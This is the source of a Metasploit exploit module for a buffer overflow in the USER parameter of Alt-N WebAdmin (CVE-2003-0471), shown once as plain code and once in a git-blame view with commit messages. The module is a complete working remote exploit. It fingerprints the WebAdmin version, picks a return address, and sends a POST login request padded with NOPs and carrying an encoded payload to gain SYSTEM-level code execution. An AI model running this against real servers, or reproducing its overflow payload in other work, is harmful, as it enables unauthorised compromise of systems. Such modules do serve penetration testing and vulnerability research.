metasploit-framework/modules/exploits/windows/http/altn_webadmin.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Alt-N WebAdmin USER Buffer Overflow',
      'Description'    => %q{
        Alt-N WebAdmin is prone to a buffer overflow condition. This
        is due to insufficient bounds checking on the USER
        parameter. Successful exploitation could result in code
        execution with SYSTEM level privileges.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2003-0471' ],
          [ 'OSVDB', '2207' ],
          [ 'BID', '8024'],
          [ 'URL', 'http://www.nessus.org/plugins/index.php?view=single&id=11771']
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 830,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'StackAdjustment' => -3500,

        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Automatic', {}],
          ['WebAdmin 2.0.4 Universal', { 'Ret' => 0x10074d9b }], # 2.0.4 webAdmin.dll
          ['WebAdmin 2.0.3 Universal', { 'Ret' => 0x10074b13 }], # 2.0.3 webAdmin.dll
          ['WebAdmin 2.0.2 Universal', { 'Ret' => 0x10071e3b }], # 2.0.2 webAdmin.dll
          ['WebAdmin 2.0.1 Universal', { 'Ret' => 0x100543c2 }], # 2.0.1 webAdmin.dll
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 24 2003'))

      register_options([Opt::RPORT(1000)], self.class)
  end

  def exploit

    mytarget = target

    if (target.name =~ /Automatic/)
      res = send_request_raw({
        'uri'   => '/WebAdmin.DLL'
      }, -1)

      if (res and res.body =~ /WebAdmin.*v(2\..*)$/)
        case $1
        when /2\.0\.4/
          mytarget = targets[1]
        when /2\.0\.3/
          mytarget = targets[2]
        when /2\.0\.2/
          mytarget = targets[3]
        when /2\.0\.1/
          mytarget = targets[4]
        else
          print_error("No target found for v#{$1}")
          return
        end
      else
        print_error("No target found")
      end
    end

    user_cook = rand_text_alphanumeric(2)
    post_data = 'User=' + make_nops(168) + [mytarget.ret].pack('V') + payload.encoded
    post_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In'

    print_status("Sending request...")
    res = send_request_cgi({
      'uri'          => '/WebAdmin.DLL',
      'query'        => 'View=Logon',
      'method'       => 'POST',
      'content-type' => 'application/x-www-form-urlencoded',
      'cookie'       => "User=#{user_cook}; Lang=en; Theme=standard",
      'data'         => post_data,
      'headers'      =>
      {
        'Accept'          => 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png',
        'Accept-Language' => 'en',
        'Accept-Charset'  => 'iso-8859-1,*,utf-8'
      }
    }, 5)

    handler
  end

end
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`
Various module cleanups git-svn-id: file:///home/svn/framework3/trunk@8498 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-15 00:48:03 +00:00			`# This file is part of the Metasploit Framework and may be subject to`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`# redistribution and commercial restrictions. Please see the Metasploit`
Fix up the boilerplate comment to use a better url 2012-02-21 01:40:50 +00:00			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`


New modules, module renames git-svn-id: file:///home/svn/incoming/trunk@3254 4d416f70-5f16-0410-b530-b9f4589650da 2005-12-26 14:34:22 +00:00			`require 'msf/core'`


This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`class Metasploit3 < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = AverageRanking`

			`include Msf::Exploit::Remote::HttpClient`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Alt-N WebAdmin USER Buffer Overflow',`
			`'Description' => %q{`
			`Alt-N WebAdmin is prone to a buffer overflow condition. This`
			`is due to insufficient bounds checking on the USER`
			`parameter. Successful exploitation could result in code`
			`execution with SYSTEM level privileges.`
			`},`
			`'Author' => [ 'MC' ],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'CVE', '2003-0471' ],`
			`[ 'OSVDB', '2207' ],`
			`[ 'BID', '8024'],`
			`[ 'URL', 'http://www.nessus.org/plugins/index.php?view=single&id=11771']`
			`],`
			`'Privileged' => true,`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'thread',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 830,`
			`'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",`
			`'StackAdjustment' => -3500,`

			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`['Automatic', {}],`
			`['WebAdmin 2.0.4 Universal', { 'Ret' => 0x10074d9b }], # 2.0.4 webAdmin.dll`
			`['WebAdmin 2.0.3 Universal', { 'Ret' => 0x10074b13 }], # 2.0.3 webAdmin.dll`
			`['WebAdmin 2.0.2 Universal', { 'Ret' => 0x10071e3b }], # 2.0.2 webAdmin.dll`
			`['WebAdmin 2.0.1 Universal', { 'Ret' => 0x100543c2 }], # 2.0.1 webAdmin.dll`
			`],`
			`'DefaultTarget' => 0,`
			`'DisclosureDate' => 'Jun 24 2003'))`

			`register_options([Opt::RPORT(1000)], self.class)`
			`end`

			`def exploit`

			`mytarget = target`

			`if (target.name =~ /Automatic/)`
			`res = send_request_raw({`
			`'uri' => '/WebAdmin.DLL'`
			`}, -1)`

			`if (res and res.body =~ /WebAdmin.v(2\..)$/)`
			`case $1`
			`when /2\.0\.4/`
			`mytarget = targets[1]`
			`when /2\.0\.3/`
			`mytarget = targets[2]`
			`when /2\.0\.2/`
			`mytarget = targets[3]`
			`when /2\.0\.1/`
			`mytarget = targets[4]`
			`else`
			`print_error("No target found for v#{$1}")`
			`return`
			`end`
			`else`
			`print_error("No target found")`
			`end`
			`end`

			`user_cook = rand_text_alphanumeric(2)`
			`post_data = 'User=' + make_nops(168) + [mytarget.ret].pack('V') + payload.encoded`
			`post_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In'`

			`print_status("Sending request...")`
			`res = send_request_cgi({`
			`'uri' => '/WebAdmin.DLL',`
			`'query' => 'View=Logon',`
			`'method' => 'POST',`
			`'content-type' => 'application/x-www-form-urlencoded',`
			`'cookie' => "User=#{user_cook}; Lang=en; Theme=standard",`
			`'data' => post_data,`
			`'headers' =>`
			`{`
			`'Accept' => 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png',`
			`'Accept-Language' => 'en',`
			`'Accept-Charset' => 'iso-8859-1,*,utf-8'`
			`}`
			`}, 5)`

			`handler`
			`end`
New modules, module renames git-svn-id: file:///home/svn/incoming/trunk@3254 4d416f70-5f16-0410-b530-b9f4589650da 2005-12-26 14:34:22 +00:00
More osvdb references from Steve Tornio git-svn-id: file:///home/svn/framework3/trunk@6547 4d416f70-5f16-0410-b530-b9f4589650da 2009-05-12 19:56:54 +00:00			`end`